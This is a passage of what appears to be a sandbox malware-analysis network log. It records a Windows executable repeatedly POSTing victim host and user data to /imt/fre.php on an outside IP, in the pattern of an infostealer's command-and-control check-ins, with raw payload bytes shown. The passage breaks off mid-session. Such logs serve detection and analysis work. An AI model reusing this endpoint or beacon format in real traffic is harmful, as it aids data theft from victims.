                  20 | 192.168.2.3 | 49769 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:58.836458921 CET | 1156 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:59.091531038 CET | 1156 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:59.163003922 CET | 1156 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:58 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  21 | 192.168.2.3 | 49770 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:01.423938036 CET | 1268 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:01.452536106 CET | 1268 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:02.684122086 CET | 1404 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:01 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  22 | 192.168.2.3 | 49785 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:07.452291965 CET | 1965 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:07.480137110 CET | 1965 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:07.544955015 CET | 1967 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  23 | 192.168.2.3 | 49809 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:09.396769047 CET | 7360 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:09.425380945 CET | 7360 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:09.919205904 CET | 7365 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  24 | 192.168.2.3 | 49813 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:13.834389925 CET | 7369 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:13.863667965 CET | 7369 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:13.931421995 CET | 7370 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:13 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  25 | 192.168.2.3 | 49814 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:19.463238955 CET | 7370 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:19.491267920 CET | 7371 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:20.086960077 CET | 7371 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:19 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  26 | 192.168.2.3 | 49817 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:23.655364990 CET | 7987 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:23.683413029 CET | 7987 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:24.492059946 CET | 7988 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  27 | 192.168.2.3 | 49818 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:26.318058014 CET | 7988 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:26.345900059 CET | 7989 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:26.435048103 CET | 7989 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  28 | 192.168.2.3 | 49819 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:27.828007936 CET | 7990 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:27.856122971 CET | 7990 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:27.923948050 CET | 7991 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:27 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  29 | 192.168.2.3 | 49820 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:29.237001896 CET | 7991 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:29.264524937 CET | 7991 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:29.329432964 CET | 7992 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:29 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  3 | 192.168.2.3 | 49747 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:23.379975080 CET | 1084 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:23.408200026 CET | 1085 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:23.474404097 CET | 1085 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  30 | 192.168.2.3 | 49821 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:30.587831020 CET | 7992 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:30.828551054 CET | 7993 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:30.896799088 CET | 7993 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:30 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  31 | 192.168.2.3 | 49822 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:32.864603043 CET | 7994 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:32.894982100 CET | 7994 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:32.960192919 CET | 7994 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:32 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  32 | 192.168.2.3 | 49823 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:35.140691042 CET | 7995 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:35.169219971 CET | 7995 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:35.375535965 CET | 7996 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  33 | 192.168.2.3 | 49825 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:36.493113041 CET | 8002 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:36.520931959 CET | 8002 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:37.014189005 CET | 8003 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:36 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  34 | 192.168.2.3 | 49827 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:40.295825958 CET | 8012 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:40.326971054 CET | 8012 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:40.387691975 CET | 8012 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  35 | 192.168.2.3 | 49829 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:41.914761066 CET | 8020 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:42.157748938 CET | 8020 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:42.233618021 CET | 8020 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:41 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  36 | 192.168.2.3 | 49833 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:44.612993956 CET | 8044 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:44.640516996 CET | 8045 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:44.707284927 CET | 8045 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:44 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  37 | 192.168.2.3 | 49845 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:45.744734049 CET | 8057 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:45.772535086 CET | 8058 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:45.839463949 CET | 8059 | IN | HTTP/1.0 404 Not Found
